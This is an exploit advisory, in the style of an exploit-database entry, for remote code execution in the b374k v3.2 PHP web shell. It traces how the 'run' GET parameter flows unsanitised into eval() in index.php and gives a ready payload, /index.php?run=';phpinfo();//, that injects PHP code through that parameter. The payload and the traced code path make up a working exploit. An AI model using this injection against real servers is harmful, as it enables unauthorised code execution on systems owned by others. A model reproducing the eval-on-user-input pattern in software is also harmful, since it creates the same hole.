[-] Exploit title : b374k v3.2 shell script remote code execution [-] Software dl : https://github.com/b374k/b374k [-] Date : 12-1-2018 [-] Category : Webapps [-] Author : The_Ripper [-] Tested on : Win XP [-] Dork : N/A [-] Author telegram : @The_Ripper ====================================== [-] Vulnerable page Address: b374k-master/index.php ====================================== [-] Vulnerable Source code : 73 >> eval eval($content); 72 >> $content = trim($module_init) . "?>" . $base_code . $module_code . $layout; 58 >> $module_init = "\n\$GLOBALS['module_to_load'] = array(" . implode(", ", $module_arr) . ");"; 57 >> $module_arr = array_map("packer_wrap_with_quote", $module_arr); 55 >> $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules); 54 >> $modules = explode(",", $_GET['run']); 22 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "main.php"); 21 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "resources.php"); 20 >> $base_code = ""; 63 >> $module_code .= packer_read_file($filename . ".php"); 23 >> $module_code = packer_read_file($GLOBALS['packer']['base_dir'] . "base.php"); 62 >> $filename = $GLOBALS['packer']['module_dir'] . $module; 61 >> $module = trim($module); 60 >> foreach($modules as $module) 54 >> $modules = explode(",", $_GET['run']); 70 >> $layout = str_replace("<__JS__>", $js_code, $layout); 64 >> $js_code .= "\n" . packer_read_file($filename . ".js") . "\n"; 31 >> $js_code .= "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "base.js"); 30 >> $js_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "sortable.js") . $js_main_code; 28 >> $js_main_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "main.js"); 62 >> $filename = $GLOBALS['packer']['module_dir'] . $module; 61 >> $module = trim($module); 60 >> foreach($modules as $module) 54 >> $modules = explode(",", $_GET['run']); 69 >> $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout); 27 >> $zepto_code = packer_read_file($GLOBALS['packer']['base_dir'] . "zepto.js"); 68 >> $layout = str_replace("<__CSS__>", $css_code, $layout); 36 >> $css_code = packer_read_file($GLOBALS['packer']['theme_dir'] . $theme . ".css"); 35 >> $theme = "default"; 41 >> $layout = packer_read_file($GLOBALS['packer']['base_dir'] . "layout.php"); requires: 44 >> if(isset($_SERVER['REMOTE_ADDR'])) 52 >> elseif(isset($_GET['run'])) ====================================== [-] Description : for executing your code you just need to identify an amount for $_GET['run'] . for example : /index.php?run=';phpinfo();//